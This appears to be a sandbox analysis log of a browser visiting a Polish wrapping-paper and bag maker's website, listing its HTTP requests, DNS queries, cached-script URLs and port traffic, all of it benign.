Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/samoprzylepne-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/szyte.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/rozne.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/klejone.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/disneyklejone-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/zgrzewane.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/disneysamoprzylepne-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/albums/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/img/no-portfolio-item-tiny.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/disneyzgrzewane-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/szyte.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/zgrzewane.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/10/disneysamoprzylepne-500x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /en/wrapping-paper/ HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/09/PD-70200.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/wrapping-paper/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/09/PD-70200s.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/wrapping-paper/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /en/wrapping-paper/ HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/wrapping-paper/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/09/p-70200-984x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/wrapping-paper/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/09/p-70200s-787x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/wrapping-paper/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/09/PD-70200.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/09/p-70200s-787x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/09/p-70200-984x500.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/09/PD-70200s.jpg HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /en/bags/ HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /en/bags/ HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/bags/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /en/bags/ HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/bags/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en/wrapping-paper/ HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en/bags/ HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: //$.getJSON('https://www.linkedin.com/countserv/count/share?url='+windowLocation+'&callback=', function(data) { equals www.linkedin.com (Linkedin)
Source: chromecache_238.1.dr, chromecache_347.1.drString found in binary or memory: src: '//www.youtube.com/embed/%id%?autoplay=1' equals www.youtube.com (Youtube)
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: window.open( 'http://www.linkedin.com/shareArticle?mini=true&url='+windowLocation+'&title='+$("h1.product_title").text(), "twitterWindow", "height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0" ) equals www.linkedin.com (Linkedin)
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: window.open( 'http://www.linkedin.com/shareArticle?mini=true&url='+windowLocation+'&title='+$pageTitle+'', "linkedInWindow", "height=480,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0" ) equals www.linkedin.com (Linkedin)
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: window.open( 'https://www.facebook.com/sharer/sharer.php?u='+windowLocation, "facebookWindow", "height=380,width=660,resizable=0,toolbar=0,menubar=0,status=0,location=0,scrollbars=0" ) equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: canpol.poznan.pl
Source: global trafficDNS traffic detected: DNS query: s.w.org
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: chromecache_385.1.dr, chromecache_291.1.drString found in binary or memory: http://aerolab.github.io/midnight.js/
Source: chromecache_385.1.dr, chromecache_291.1.drString found in binary or memory: http://aerolab.github.io/midnight.js/LICENSE.txt
Source: chromecache_333.1.dr, chromecache_306.1.drString found in binary or memory: http://api.jqueryui.com/position/
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: http://brandon.aaron.sh)
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: http://cherne.net/brian/resources/jquery.hoverIntent.html
Source: chromecache_238.1.dr, chromecache_347.1.drString found in binary or memory: http://dimsemenov.com/plugins/magnific-popup/
Source: chromecache_238.1.dr, chromecache_347.1.drString found in binary or memory: http://dimsemenov.com/plugins/magnific-popup/documentation.html#options
Source: chromecache_221.1.dr, chromecache_193.1.drString found in binary or memory: http://fancybox.net
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: http://github.com/rstacruz/jquery.transit
Source: chromecache_305.1.dr, chromecache_363.1.drString found in binary or memory: http://greensock.com
Source: chromecache_305.1.dr, chromecache_363.1.drString found in binary or memory: http://greensock.com/standard-license
Source: chromecache_212.1.dr, chromecache_209.1.dr, chromecache_232.1.dr, chromecache_314.1.drString found in binary or memory: http://gsgd.co.uk/sandbox/jquery/easing/
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: http://imakewebthings.com/waypoints/shortcuts/sticky-elements
Source: chromecache_210.1.dr, chromecache_384.1.drString found in binary or memory: http://infinite-scroll.com/
Source: chromecache_253.1.dr, chromecache_373.1.drString found in binary or memory: http://isotope.metafizzy.co
Source: chromecache_352.1.dr, chromecache_374.1.drString found in binary or memory: http://j.hn/)
Source: chromecache_333.1.dr, chromecache_340.1.dr, chromecache_380.1.dr, chromecache_306.1.dr, chromecache_397.1.dr, chromecache_190.1.drString found in binary or memory: http://jquery.org/license
Source: chromecache_306.1.dr, chromecache_397.1.dr, chromecache_190.1.drString found in binary or memory: http://jqueryui.com
Source: chromecache_390.1.dr, chromecache_329.1.drString found in binary or memory: http://masonry.desandro.com
Source: chromecache_379.1.dr, chromecache_227.1.drString found in binary or memory: http://modernizr.com/download/#-fontface-backgroundsize-borderimage-borderradius-boxshadow-flexbox-f
Source: chromecache_253.1.dr, chromecache_373.1.drString found in binary or memory: http://packery.metafizzy.co
Source: chromecache_209.1.drString found in binary or memory: http://pinterest.com/pin/create/button/?url=
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: http://ricostacruz.com/jquery.transit
Source: chromecache_350.1.dr, chromecache_258.1.drString found in binary or memory: http://rock.mit-license.org
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: http://roy-jin.appspot.com/jsp/textareaCounter.jsp
Source: chromecache_238.1.dr, chromecache_347.1.drString found in binary or memory: http://stackoverflow.com/questions/7264899/detect-css-transitions-using-javascript-and-without-moder
Source: chromecache_372.1.drString found in binary or memory: http://themenectar.com
Source: chromecache_209.1.drString found in binary or memory: http://twitter.com/intent/tweet?text=
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: http://www.codrops.com
Source: chromecache_372.1.drString found in binary or memory: http://www.gnu.org/licenses/gpl-3.0.html
Source: chromecache_358.1.dr, chromecache_212.1.dr, chromecache_209.1.dr, chromecache_221.1.dr, chromecache_193.1.dr, chromecache_297.1.drString found in binary or memory: http://www.gnu.org/licenses/gpl.html
Source: chromecache_209.1.drString found in binary or memory: http://www.linkedin.com/shareArticle?mini=true&url=
Source: chromecache_352.1.dr, chromecache_374.1.drString found in binary or memory: http://www.mediaelementjs.com/
Source: chromecache_358.1.dr, chromecache_212.1.dr, chromecache_209.1.dr, chromecache_221.1.dr, chromecache_193.1.dr, chromecache_297.1.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: chromecache_372.1.drString found in binary or memory: http://www.themenectar.com
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: https://api.pinterest.com/v1/urls/count.json?url=
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: https://cdn.api.twitter.com/1/urls/count.json?url=
Source: chromecache_238.1.dr, chromecache_347.1.drString found in binary or memory: https://developers.google.com/mobile/articles/fast_buttons
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlU-YpnLl.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlUWYpnLl.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlUaYpnLl.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlUeYpnLl.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlUiYpnLl.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlUuYpg.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Hw0aXpsog.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Hw2aXpsog.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Hw3aXpsog.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Hw5aXo.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Hw9aXpsog.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/playfairdisplay/v37/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_qiTXt7A
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/playfairdisplay/v37/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_qiTXtHA
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/playfairdisplay/v37/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_qiTXtXA
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/playfairdisplay/v37/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_qiTXt_A
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2)
Source: chromecache_230.1.drString found in binary or memory: https://fonts.gstatic.com/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2)
Source: chromecache_238.1.dr, chromecache_347.1.drString found in binary or memory: https://github.com/dimsemenov/Magnific-Popup/issues/2
Source: chromecache_238.1.dr, chromecache_347.1.drString found in binary or memory: https://github.com/ftlabs/fastclick
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: https://github.com/louisremi/jquery.smartresize.js
Source: chromecache_349.1.dr, chromecache_367.1.drString found in binary or memory: https://github.com/maxwellito/vivus
Source: chromecache_210.1.dr, chromecache_384.1.drString found in binary or memory: https://github.com/paulirish/infinite-scroll
Source: chromecache_247.1.dr, chromecache_326.1.dr, chromecache_315.1.drString found in binary or memory: https://github.com/sachinchoolur/lightslider
Source: chromecache_350.1.dr, chromecache_258.1.drString found in binary or memory: https://github.com/zloirock/core-js
Source: chromecache_381.1.dr, chromecache_327.1.drString found in binary or memory: https://masonry.desandro.com
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: https://plus.google.com/share?url=
Source: chromecache_212.1.dr, chromecache_209.1.drString found in binary or memory: https://www.linkedin.com/countserv/count/share?url=
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49292 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
